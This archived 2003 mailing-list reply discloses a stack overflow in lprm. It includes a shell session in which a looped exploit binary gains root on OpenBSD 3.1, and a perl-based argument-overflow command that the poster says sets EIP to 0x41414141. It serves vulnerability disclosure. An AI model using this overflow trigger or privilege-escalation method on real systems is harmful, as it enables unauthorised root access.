Re: potential buffer overflow in lprm (fwd)

From: noir sin (noirat_private)
Date: Wed Mar 05 2003 - 21:58:54 PST

Next message: Daniel Ahlberg: "GLSA: mysqlcc (200303-7)"

Previous message: Aleksey Sintsov: "Wordit Logbook Version 0.98b3"
Maybe in reply to: Dave Ahmad: "potential buffer overflow in lprm (fwd)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> A bounds check that was added to lprm in 1996 does its checking too
> late to be effective.  Because of the insufficient check, it may
> be possible for a local user to exploit lprm to gain elevated
> privileges.  It is not know at this time whether or not the bug is
> actually exploitable.

a real funny stack overflow! if you got a valid printer setup its instant
root!

there is nothing "potential" about this, it is uid=0 ;pPp

bash-2.05a$ id
uid=1000(noir) gid=10(users) groups=10(users)
bash-2.05a$ while `test .`; do ./lprm_ex; done
lp: unknown printer
Segmentation fault
lp: unknown printer
Segmentation fault
lp: unknown printer
Segmentation fault
lp: unknown printer
# id
uid=1000(noir) euid=0(root) gid=10(users) egid=1(daemon) groups=10(users)
# uname -a
OpenBSD kernfu 3.1 conf#0 i386
#


to repro: lprm -Pvalid_printer_name `perl -e 'print "A"x512'` `perl -e
'print "A"x518'`

this shall get you eip = 0x41414141

Next message: Daniel Ahlberg: "GLSA: mysqlcc (200303-7)"
Previous message: Aleksey Sintsov: "Wordit Logbook Version 0.98b3"
Maybe in reply to: Dave Ahmad: "potential buffer overflow in lprm (fwd)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Mar 07 2003 - 08:57:42 PST